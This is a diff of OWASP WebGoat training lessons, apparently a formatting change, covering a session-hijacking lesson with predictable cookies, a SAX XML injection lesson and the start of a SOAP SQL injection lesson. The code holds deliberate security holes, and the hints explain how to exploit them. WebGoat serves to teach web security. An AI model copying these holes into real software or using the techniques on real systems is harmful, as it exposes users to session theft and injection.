-	    s.getResponse().addCookie(cookie);
+		long now = System.currentTimeMillis();
+		seq++;
+		if (seq % 29 == 0)
+		{
+			String target = encode(seq++, lastTime + (now - lastTime) / 2);
+			sessionList.add(target);
+			s.setMessage(target);
+			if (sessionList.size() > 100) sessionList.remove(0);
+		}
+		lastTime = now;
+		return encode(seq, now);
 	}
 
-	ec.addElement(new H1().addElement("Sign In "));
-	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		.setWidth("90%").setAlign("center");
-
-	if (s.isColor())
+	private String encode(long seq, long time)
 	{
-	    t.setBorder(1);
+		return new String(Long.toString(seq) + "-" + Long.toString(time));
 	}
 
-	String username = null;
-	String password = null;
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		try
+		{
+			String sessionid = s.getCookie(SESSIONID);
+			if (sessionid != null && sessionList.indexOf(sessionid) > -1)
+			{
+				return makeSuccess(s);
+			}
+			else
+			{
+				return makeLogin(s);
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
 
-	try
-	{
-	    username = s.getParser().getStringParameter(USERNAME);
-	}
-	catch (ParameterNotFoundException pnfe)
-	{}
-	try
-	{
-	    password = s.getParser().getStringParameter(PASSWORD);
-	}
-	catch (ParameterNotFoundException pnfe)
-	{}
-
-	if (username != null || password != null)
-	{
-	    s.setMessage("Invalid username or password.");
+		return (null);
 	}
 
-	TR tr = new TR();
-	tr.addElement(new TH().addElement("Please sign in to your account.")
-		.setColSpan(2).setAlign("left"));
-	t.addElement(tr);
+	/**
+	 * Gets the category attribute of the WeakAuthenticationCookie object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.SESSION_MANAGEMENT;
+	}
 
-	tr = new TR();
-	tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
-	t.addElement(tr);
+	/**
+	 * Gets the hints attribute of the CookieScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("The server skips authentication if you send the right cookie.");
+		hints.add("Is the cookie value predictable? Can you see gaps where someone else has acquired a cookie?");
+		hints.add("Try harder, you brute!");
+		hints.add("The first part of the cookie is a sequential number, the second part is milliseconds.");
+		hints.add("After the 29th try, the skipped identifier is printed to your screen. Use that to login.");
+		return hints;
+	}
 
-	tr = new TR();
-	tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	t.addElement(tr);
+	private final static Integer DEFAULT_RANKING = new Integer(90);
 
-	TR row1 = new TR();
-	TR row2 = new TR();
-	row1.addElement(new TD(new B(new StringElement("*User Name: "))));
-	row2.addElement(new TD(new B(new StringElement("*Password: "))));
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-	Input input1 = new Input(Input.TEXT, USERNAME, "");
-	Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
-	Input input3 = new Input(Input.HIDDEN, SESSIONID, weakid);
-	row1.addElement(new TD(input1));
-	row2.addElement(new TD(input2));
-	t.addElement(row1);
-	t.addElement(row2);
-	t.addElement(input3);
+	/**
+	 * Gets the title attribute of the CookieScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Hijack a Session");
+	}
 
-	Element b = ECSFactory.makeButton("Login");
-	t.addElement(new TR(new TD(b)));
-	ec.addElement(t);
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeLogin(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
-	return (ec);
-    }
+		String weakid = s.getCookie(SESSIONID);
+
+		if (weakid == null)
+		{
+			weakid = newCookie(s);
+			Cookie cookie = new Cookie(SESSIONID, weakid);
+			s.getResponse().addCookie(cookie);
+		}
+
+		ec.addElement(new H1().addElement("Sign In "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		String username = null;
+		String password = null;
+
+		try
+		{
+			username = s.getParser().getStringParameter(USERNAME);
+		} catch (ParameterNotFoundException pnfe)
+		{
+		}
+		try
+		{
+			password = s.getParser().getStringParameter(PASSWORD);
+		} catch (ParameterNotFoundException pnfe)
+		{
+		}
+
+		if (username != null || password != null)
+		{
+			s.setMessage("Invalid username or password.");
+		}
+
+		TR tr = new TR();
+		tr.addElement(new TH().addElement("Please sign in to your account.").setColSpan(2).setAlign("left"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+
+		TR row1 = new TR();
+		TR row2 = new TR();
+		row1.addElement(new TD(new B(new StringElement("*User Name: "))));
+		row2.addElement(new TD(new B(new StringElement("*Password: "))));
+
+		Input input1 = new Input(Input.TEXT, USERNAME, "");
+		Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+		Input input3 = new Input(Input.HIDDEN, SESSIONID, weakid);
+		row1.addElement(new TD(input1));
+		row2.addElement(new TD(input2));
+		t.addElement(row1);
+		t.addElement(row2);
+		t.addElement(input3);
+
+		Element b = ECSFactory.makeButton("Login");
+		t.addElement(new TR(new TD(b)));
+		ec.addElement(t);
+
+		return (ec);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java
index 4885c029e..1989efc76 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import org.apache.ecs.Element;
@@ -11,153 +12,140 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.*;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class WelcomeScreen extends Screen
 {
 
-    /**
-     *  Constructor for the WelcomeScreen object
-     *
-     * @param  s  Description of the Parameter
-     */
-    public WelcomeScreen(WebSession s)
-    {
-	setup(s);
-    }
-
-
-    /**
-     *  Constructor for the WelcomeScreen object
-     */
-    public WelcomeScreen()
-    {}
-
-
-    public void setup(WebSession s)
-    {
-	// call createContent first so messages will go somewhere
-
-	Form form = new Form("attack", Form.POST).setName("form")
-		.setEncType("");
-
-	form.addElement(wrapForm(s));
-
-	TD lowerright = new TD().setHeight("100%").setVAlign("top").setAlign(
-		"left").addElement(form);
-	TR row = new TR().addElement(lowerright);
-	Table layout = new Table().setBgColor(HtmlColor.WHITE)
-		.setCellSpacing(0).setCellPadding(0).setBorder(0);
-
-	layout.addElement(row);
-
-	setContent(layout);
-    }
-
-
-    protected Element wrapForm(WebSession s)
-    {
-	if (s == null)
+	/**
+	 * Constructor for the WelcomeScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public WelcomeScreen(WebSession s)
 	{
-	    return new StringElement("Invalid Session");
+		setup(s);
 	}
 
-	Table container = new Table().setWidth("100%").setCellSpacing(10)
-		.setCellPadding(0).setBorder(0);
+	/**
+	 * Constructor for the WelcomeScreen object
+	 */
+	public WelcomeScreen()
+	{
+	}
 
-	// CreateContent can generate error messages so you MUST call it before makeMessages()
-	Element content = createContent(s);
-	container.addElement(new TR().addElement(new TD().setColSpan(2)
-		.setVAlign("TOP").addElement(makeMessages(s))));
-	container.addElement(new TR().addElement(new TD().setColSpan(2)
-		.addElement(content)));
-	container.addElement(new TR());
+	public void setup(WebSession s)
+	{
+		// call createContent first so messages will go somewhere
 
-	return (container);
-    }
+		Form form = new Form("attack", Form.POST).setName("form").setEncType("");
 
+		form.addElement(wrapForm(s));
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	Element b = ECSFactory.makeButton("Start the Course!");
-	ec.addElement(new Center(b));
+		TD lowerright = new TD().setHeight("100%").setVAlign("top").setAlign("left").addElement(form);
+		TR row = new TR().addElement(lowerright);
+		Table layout = new Table().setBgColor(HtmlColor.WHITE).setCellSpacing(0).setCellPadding(0).setBorder(0);
 
-	return (ec);
-    }
+		layout.addElement(row);
 
+		setContent(layout);
+	}
 
-    public Element getCredits()
-    {
-	return new ElementContainer();
-    }
+	protected Element wrapForm(WebSession s)
+	{
+		if (s == null) { return new StringElement("Invalid Session"); }
 
+		Table container = new Table().setWidth("100%").setCellSpacing(10).setCellPadding(0).setBorder(0);
 
-    /**
-     *  Gets the instructions attribute of the WelcomeScreen object
-     *
-     * @return    The instructions value
-     */
-    protected String getInstructions()
-    {
-	String instructions = "Enter your name and learn how HTTP really works!";
+		// CreateContent can generate error messages so you MUST call it before makeMessages()
+		Element content = createContent(s);
+		container.addElement(new TR().addElement(new TD().setColSpan(2).setVAlign("TOP").addElement(makeMessages(s))));
+		container.addElement(new TR().addElement(new TD().setColSpan(2).addElement(content)));
+		container.addElement(new TR());
 
-	return (instructions);
-    }
+		return (container);
+	}
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		Element b = ECSFactory.makeButton("Start the Course!");
+		ec.addElement(new Center(b));
 
-    /**
-     *  Gets the title attribute of the WelcomeScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Welcome to the Penetration Testing Course");
-    }
+		return (ec);
+	}
 
+	public Element getCredits()
+	{
+		return new ElementContainer();
+	}
 
-    /* (non-Javadoc)
-     * @see session.Screen#getRole()
-     */
-    public String getRole()
-    {
-	return AbstractLesson.USER_ROLE;
-    }
+	/**
+	 * Gets the instructions attribute of the WelcomeScreen object
+	 * 
+	 * @return The instructions value
+	 */
+	protected String getInstructions()
+	{
+		String instructions = "Enter your name and learn how HTTP really works!";
+
+		return (instructions);
+	}
+
+	/**
+	 * Gets the title attribute of the WelcomeScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Welcome to the Penetration Testing Course");
+	}
+
+	/*
+	 * (non-Javadoc)
+	 * 
+	 * @see session.Screen#getRole()
+	 */
+	public String getRole()
+	{
+		return AbstractLesson.USER_ROLE;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java
index ef022bd75..8a7c0d4f9 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java
@@ -1,16 +1,14 @@
 /*
- * Created on Jun 1, 2005
- *
- * TODO To change the template for this generated file go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * Created on Jun 1, 2005 TODO To change the template for this generated file go to Window -
+ * Preferences - Java - Code Style - Code Templates
  */
+
 package org.owasp.webgoat.lessons;
 
 import java.io.IOException;
 import java.io.StringReader;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -18,7 +16,6 @@ import org.apache.ecs.html.B;
 import org.apache.ecs.html.Input;
 import org.apache.ecs.html.P;
 import org.apache.ecs.html.PRE;
-
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
@@ -29,235 +26,202 @@ import org.xml.sax.XMLReader;
 import org.xml.sax.helpers.DefaultHandler;
 import org.xml.sax.helpers.XMLReaderFactory;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author rdawes
  * 
- * TODO To change the template for this generated type comment go to Window -
- * Preferences - Java - Code Style - Code Templates
+ * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ * Code Style - Code Templates
  */
 public class WsSAXInjection extends LessonAdapter
 {
 
-    private final static String PASSWORD = "password";
+	private final static String PASSWORD = "password";
 
-    private String password;
+	private String password;
 
-    private static String template1 = "<?xml version='1.0' encoding='UTF-8'?>\n"
-	    + "<wsns0:Envelope\n"
-	    + "  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'\n"
-	    + "  xmlns:xsd='http://www.w3.org/2001/XMLSchema'\n"
-	    + "  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'\n"
-	    + "  xmlns:wsns1='http://lessons.webgoat.owasp.org'>\n"
-	    + "  <wsns0:Body>\n"
-	    + "    <wsns1:changePassword>\n"
-	    + "      <id xsi:type='xsd:int'>101</id>\n"
-	    + "      <password xsi:type='xsd:string'>";
+	private static String template1 = "<?xml version='1.0' encoding='UTF-8'?>\n" + "<wsns0:Envelope\n"
+			+ "  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'\n"
+			+ "  xmlns:xsd='http://www.w3.org/2001/XMLSchema'\n"
+			+ "  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'\n"
+			+ "  xmlns:wsns1='http://lessons.webgoat.owasp.org'>\n" + "  <wsns0:Body>\n"
+			+ "    <wsns1:changePassword>\n" + "      <id xsi:type='xsd:int'>101</id>\n"
+			+ "      <password xsi:type='xsd:string'>";
 
-    private static String template2 = "</password>\n"
-	    + "    </wsns1:changePassword>\n" + "  </wsns0:Body>\n"
-	    + "</wsns0:Envelope>";
+	private static String template2 = "</password>\n" + "    </wsns1:changePassword>\n" + "  </wsns0:Body>\n"
+			+ "</wsns0:Envelope>";
 
-    static boolean completed;
+	static boolean completed;
 
-
-    protected Category getDefaultCategory()
-    {
-	return Category.WEB_SERVICES;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-
-	hints.add("The backend parses the XML received using a SAX parser.");
-	hints.add("SAX parsers often don't care if an element is repeated.");
-	hints
-		.add("If there are repeated elements, the last one is the one that is effective");
-	hints
-		.add("Try injecting matching 'close' tags, and creating your own XML elements");
-
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(150);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    public String getTitle()
-    {
-	return "Web Service SAX Injection";
-    }
-
-
-    protected Element makeInputLine(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec.addElement(new P().addElement("Please change your password: "));
-
-	Input input = new Input(Input.TEXT, PASSWORD);
-	ec.addElement(input);
-
-	Element b = ECSFactory.makeButton("Go!");
-	ec.addElement(b);
-
-	return ec;
-    }
-
-
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	try
+	protected Category getDefaultCategory()
 	{
-	    ec.addElement(makeInputLine(s));
-
-	    password = s.getParser().getRawParameter(PASSWORD, null);
-
-	    PRE pre = new PRE();
-	    String xml = template1;
-	    xml = xml + (password == null ? "[password]" : password);
-	    xml = xml + template2;
-	    pre.addElement(HtmlEncoder.encode(xml));
-	    ec.addElement(pre);
-
-	    if (password != null)
-	    {
-		ec.addElement(checkXML(s, xml));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
-	}
-	return (ec);
-    }
-
-
-    private Element checkXML(WebSession s, String xml)
-    {
-	try
-	{
-	    XMLReader reader = XMLReaderFactory.createXMLReader();
-	    PasswordChanger changer = new PasswordChanger();
-	    reader.setContentHandler(changer);
-	    reader.parse(new InputSource(new StringReader(xml)));
-	    if (!"101".equals(changer.getId()))
-	    {
-		makeSuccess(s);
-		return new B(HtmlEncoder
-			.encode("You have changed the passsword for userid "
-				+ changer.getId() + " to '"
-				+ changer.getPassword() + "'"));
-	    }
-	    else
-	    {
-		return new StringElement(
-			"You changed the password for userid 101. Try again.");
-	    }
-	}
-	catch (SAXException saxe)
-	{
-	    return new StringElement("The XML was not well formed: "
-		    + saxe.getLocalizedMessage());
-	}
-	catch (IOException ioe)
-	{
-	    return new StringElement(ioe.getLocalizedMessage());
-	}
-    }
-
-    private static class PasswordChanger extends DefaultHandler
-    {
-
-	private static String PASSWORD_TAG = "password";
-
-	private static String ID_TAG = "id";
-
-	private String id = null;
-
-	private String password = null;
-
-	private StringBuffer text = new StringBuffer();
-
-
-	public void startElement(String uri, String localName, String qName,
-		Attributes atts) throws SAXException
-	{
-	    text.delete(0, text.length());
+		return Category.WEB_SERVICES;
 	}
 
-
-	public void characters(char[] ch, int start, int length)
-		throws SAXException
+	protected List<String> getHints(WebSession s)
 	{
-	    text.append(ch, start, length);
+		List<String> hints = new ArrayList<String>();
+
+		hints.add("The backend parses the XML received using a SAX parser.");
+		hints.add("SAX parsers often don't care if an element is repeated.");
+		hints.add("If there are repeated elements, the last one is the one that is effective");
+		hints.add("Try injecting matching 'close' tags, and creating your own XML elements");
+
+		return hints;
 	}
 
+	private final static Integer DEFAULT_RANKING = new Integer(150);
 
-	public void endElement(String uri, String localName, String qName)
-		throws SAXException
+	protected Integer getDefaultRanking()
 	{
-	    if (localName.equals(ID_TAG))
-		id = text.toString();
-	    if (localName.equals(PASSWORD_TAG))
-		password = text.toString();
-	    text.delete(0, text.length());
+		return DEFAULT_RANKING;
 	}
 
-
-	public void ignorableWhitespace(char[] ch, int start, int length)
-		throws SAXException
+	public String getTitle()
 	{
-	    text.append(ch, start, length);
+		return "Web Service SAX Injection";
 	}
 
-
-	public String getId()
+	protected Element makeInputLine(WebSession s)
 	{
-	    return id;
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(new P().addElement("Please change your password: "));
+
+		Input input = new Input(Input.TEXT, PASSWORD);
+		ec.addElement(input);
+
+		Element b = ECSFactory.makeButton("Go!");
+		ec.addElement(b);
+
+		return ec;
 	}
 
-
-	public String getPassword()
+	protected Element createContent(WebSession s)
 	{
-	    return password;
+		ElementContainer ec = new ElementContainer();
+		try
+		{
+			ec.addElement(makeInputLine(s));
+
+			password = s.getParser().getRawParameter(PASSWORD, null);
+
+			PRE pre = new PRE();
+			String xml = template1;
+			xml = xml + (password == null ? "[password]" : password);
+			xml = xml + template2;
+			pre.addElement(HtmlEncoder.encode(xml));
+			ec.addElement(pre);
+
+			if (password != null)
+			{
+				ec.addElement(checkXML(s, xml));
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
 	}
 
-    }
+	private Element checkXML(WebSession s, String xml)
+	{
+		try
+		{
+			XMLReader reader = XMLReaderFactory.createXMLReader();
+			PasswordChanger changer = new PasswordChanger();
+			reader.setContentHandler(changer);
+			reader.parse(new InputSource(new StringReader(xml)));
+			if (!"101".equals(changer.getId()))
+			{
+				makeSuccess(s);
+				return new B(HtmlEncoder.encode("You have changed the passsword for userid " + changer.getId()
+						+ " to '" + changer.getPassword() + "'"));
+			}
+			else
+			{
+				return new StringElement("You changed the password for userid 101. Try again.");
+			}
+		} catch (SAXException saxe)
+		{
+			return new StringElement("The XML was not well formed: " + saxe.getLocalizedMessage());
+		} catch (IOException ioe)
+		{
+			return new StringElement(ioe.getLocalizedMessage());
+		}
+	}
+
+	private static class PasswordChanger extends DefaultHandler
+	{
+
+		private static String PASSWORD_TAG = "password";
+
+		private static String ID_TAG = "id";
+
+		private String id = null;
+
+		private String password = null;
+
+		private StringBuffer text = new StringBuffer();
+
+		public void startElement(String uri, String localName, String qName, Attributes atts) throws SAXException
+		{
+			text.delete(0, text.length());
+		}
+
+		public void characters(char[] ch, int start, int length) throws SAXException
+		{
+			text.append(ch, start, length);
+		}
+
+		public void endElement(String uri, String localName, String qName) throws SAXException
+		{
+			if (localName.equals(ID_TAG)) id = text.toString();
+			if (localName.equals(PASSWORD_TAG)) password = text.toString();
+			text.delete(0, text.length());
+		}
+
+		public void ignorableWhitespace(char[] ch, int start, int length) throws SAXException
+		{
+			text.append(ch, start, length);
+		}
+
+		public String getId()
+		{
+			return id;
+		}
+
+		public String getPassword()
+		{
+			return password;
+		}
+
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java
index 0bcbbd19f..267cec771 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java
@@ -1,9 +1,8 @@
 /*
- * Created on Jun 1, 2005
- *
- * TODO To change the template for this generated file go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * Created on Jun 1, 2005 TODO To change the template for this generated file go to Window -
+ * Preferences - Java - Code Style - Code Templates
  */
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -13,7 +12,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -22,273 +20,256 @@ import org.apache.ecs.html.IMG;
 import org.apache.ecs.html.Input;
 import org.apache.ecs.html.P;
 import org.apache.ecs.html.PRE;
-
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.WebgoatContext;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author asmolen
- *
- * TODO To change the template for this generated type comment go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * 
+ * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ * Code Style - Code Templates
  */
 public class WsSqlInjection extends LessonAdapter
 {
 
-    public final static String ccNumber = "cc_number";
+	public final static String ccNumber = "cc_number";
 
-    private final static String ACCT_NUM = "account_number";
+	private final static String ACCT_NUM = "account_number";
 
-    private String accountNumber;
+	private String accountNumber;
 
-    final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg")
-	    .setAlt("Parasoft").setBorder(0).setHspace(0).setVspace(0);
+	final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg").setAlt("Parasoft").setBorder(0).setHspace(0)
+			.setVspace(0);
 
-    /* (non-Javadoc)
-     * @see lessons.AbstractLesson#getMenuItem()
-     */
-    static boolean completed;
+	/*
+	 * (non-Javadoc)
+	 * 
+	 * @see lessons.AbstractLesson#getMenuItem()
+	 */
+	static boolean completed;
 
 	private static WebgoatContext webgoatContext;
-	
+
 	/**
-	 * We maintain a static reference to WebgoatContext, since this class
-	 * is also automatically instantiated by the Axis web services module,
-	 * which does not call setWebgoatContext()
+	 * We maintain a static reference to WebgoatContext, since this class is also automatically
+	 * instantiated by the Axis web services module, which does not call setWebgoatContext()
 	 * (non-Javadoc)
+	 * 
 	 * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext)
 	 */
 	@Override
-	public void setWebgoatContext(WebgoatContext webgoatContext) {
+	public void setWebgoatContext(WebgoatContext webgoatContext)
+	{
 		WsSqlInjection.webgoatContext = webgoatContext;
 	}
-	
+
 	@Override
-	public WebgoatContext getWebgoatContext() {
+	public WebgoatContext getWebgoatContext()
+	{
 		return WsSqlInjection.webgoatContext;
 	}
 
-
-    protected Category getDefaultCategory()
-    {
-	return Category.WEB_SERVICES;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("Try connecting to the WSDL with a browser or Web Service tool.");
-	hints
-		.add("Sometimes the server side code will perform input validation before issuing  "
-			+ "the request to the web service operation.  Try to bypass this check by "
-			+ "accessing the web service directly");
-	hints
-		.add("The URL for the web service is: http://localhost/WebGoat/services/WsSqlInjection?WSDL <br>"
-			+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
-	hints
-		.add("Create a new soap request for the getCreditCard(String id) operation.");
-	hints
-		.add("A soap request uses the following HTTP header: <br> "
-			+ "SOAPAction: some action header, can be &quot;&quot;<br><br>"
-			+ "The soap message body has the following format:<br>"
-			+ "&lt;?xml version='1.0' encoding='UTF-8'?&gt; <br>"
-			+ "&nbsp;&nbsp;&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'&gt; <br>"
-			+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;SOAP-ENV:Body&gt; <br>"
